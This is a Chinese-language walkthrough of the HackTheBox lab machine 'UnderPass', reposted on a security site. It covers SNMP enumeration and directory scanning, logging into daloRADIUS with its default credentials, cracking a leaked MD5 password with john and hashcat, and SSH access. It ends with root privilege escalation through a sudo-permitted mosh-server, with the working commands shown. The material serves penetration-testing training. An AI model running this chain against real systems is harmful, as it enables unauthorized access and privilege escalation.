UnderPass

admin 2025年2月8日01:14:51评论4 views字数 2940阅读9分48秒阅读模式

UnderPass

https://app.hackthebox.com/machines/UnderPass

受害者ip:10.10.11.48

攻击者ip:10.10.16.12

参考:https://www.hyhforever.top/htb-underpass/

https://medium.com/@0xindranil/htb-underpass-da984bfe2e85

https://blog.csdn.net/qq_52772100/article/details/145062562

端口扫描

UnderPass

80端口是apache的默认页面,并且目录也是空的

UnderPass

UnderPass

使用udp协议扫描

发现开放161snmp服务

nmap -sU --min-rate 1000010.10.11.48 -oA udp            

SNMP(Simple Network Management Protocol)是一种用于管理网络设备的协议。它允许网络管理员监控网络设备的性能和状态,以及进行故障排除和配置更改。SNMP通过在网络设备上运行的代理程序收集有关设备的信息,并将这些信息发送给网络管理系统。网络管理系统可以使用这些信息来了解网络设备的状态,以便及时发现和解决问题。SNMP还可以用于配置网络设备,例如更改设备的IP地址或路由表。

SNMP协议采用轮询机制,提供最基本的功能集,适合小型、快速、低价格的环境使用,而且snmp协议以用户数据报协议(UDP)报文为承载,因而受到绝大多数设备的支持,同时保证管理信息再任意两点传送,便于管理员在网络上的任何节点检索信息,进行故障排查

UnderPass

snmpwalk 是一种常用的网络管理工具,用于通过 SNMP(Simple Network Management Protocol,简单网络管理协议) 从目标设备获取信息。它会递归地遍历目标设备的 MIB(Management Information Base,管理信息库),提取各种数据,比如系统信息、网络接口状态、路由表、设备运行时间等。

snmpwalk -c public -v2c 10.10.11.48            -c public:            指定社区字符串为 public,这是默认的只读访问字符串。            -v2c:            使用 SNMP v2c 协议(比 v1 和 v3 更常用,支持更大数据集传输)。            SNMPv2-MIB::sysDescr.0: 操作系统描述。            SNMPv2-MIB::sysUpTime.0: 设备运行时间(从最后一次启动开始)。            SNMPv2-MIB::sysContact.0: 设备管理员的联系信息。            SNMPv2-MIB::sysName.0: 设备名称。            SNMPv2-MIB::sysLocation.0: 设备位置。            

UnderPass

steve可能是某个用户名,将underpass.htb加入到host

其中提示有daloradius服务

iso.3.6.1.2.1.1.4.0 = STRING: "[email protected]"iso.3.6.1.2.1.1.5.0 = STRING: "UnDerPass.htb is the only daloradius server in the basin!"

echo "10.10.11.48 underpass.htb" >> /etc/hosts             

UnderPass

目录扫描

dirsearch -u underpass.htb/daloradius -t 100

发现文件/daloradius/docker-compose.yml,docke配置文件里面有mysql的账号密码radius/radiusrootdbpw

UnderPass

UnderPass

搜索到默认账号密码

administrator/radius

UnderPass

在这里也能找到默认账号密码

http://10.10.11.48/daloradius/doc/install/INSTALL

UnderPass

扫描app目录

dirsearch -u underpass.htb/daloradius/app -t 100 

或者使用-r参数递归扫描

dirsearch -u underpass.htb/daloradius/ -t 100 -r 

然后就能找到登录口

UnderPass

UnderPass

UnderPass

users的登录口进不去,可能是兔子洞。换一个大点的字典再扫一下,找到operator

dirsearch -u "http://underpass.htb/daloradius/app/" -t 200 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt            

UnderPass

http://underpass.htb/daloradius/app/operators/login.php

使用默认账号密码成功登录

Username: administratorPassword: radius

UnderPass

似乎这个版本并没找到有效的poc

UnderPass

UnderPass

回到首页发现用户名svcMosh和他的md5密码

UnderPass

解密后svcMosh/underwaterfriends 

UnderPass

john爆破

john --wordlist=/usr/share/wordlists/rockyou.txt md5.txt --format=Raw-MD5

UnderPass

hashcat爆破

hashcat '412DD4759978ACFCC81DEAB01B382403' -m 0 -a 0 /usr/share/wordlists/rockyou.txt

UnderPass

直接ssh连接,然后sudo -l起手

ssh [email protected]

UnderPass

Mosh表示移动Shell(Mobile Shell),是一个用于从客户端跨互联网连接远程服务器的命令行工具。它能用于SSH连接,但是比Secure Shell功能更多。它是一个类似于SSH而带有更多功能的应用。程序最初由Keith Winstein 编写,用于类Unix的操作系统中,发布于GNU GPL V3协议下

--client=PATH:指定本地机器上的 Mosh 客户端路径。            --server=COMMAND:指定远程机器上运行的 Mosh 服务器命令。            --predict=adaptive|always|never|experimental:控制本地回显的行为,适用于不同的网络延迟条件。            -4, -6, --family=inet|inet6|auto|all|prefer-inet|prefer-inet6:指定网络协议(IPv4 或 IPv6)。            -p PORT[:PORT2]:指定服务器端使用的 UDP 端口或端口范围。            --ssh=COMMAND:用于建立会话的 SSH 命令。            --no-ssh-pty:在 SSH 连接中不分配伪终端。            --local:在本地运行 mosh-server,不使用 SSH。            --help:显示帮助信息。            --version:显示版本和版权信息            

UnderPass

使用--server参数连自己达到提权效果

mosh --server="sudo /usr/bin/mosh-server" localhost

UnderPass

UnderPass

原文始发于微信公众号(王之暴龙战神):UnderPass

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年2月8日01:14:51
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   UnderPasshttp://cn-sec.com/archives/3703856.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息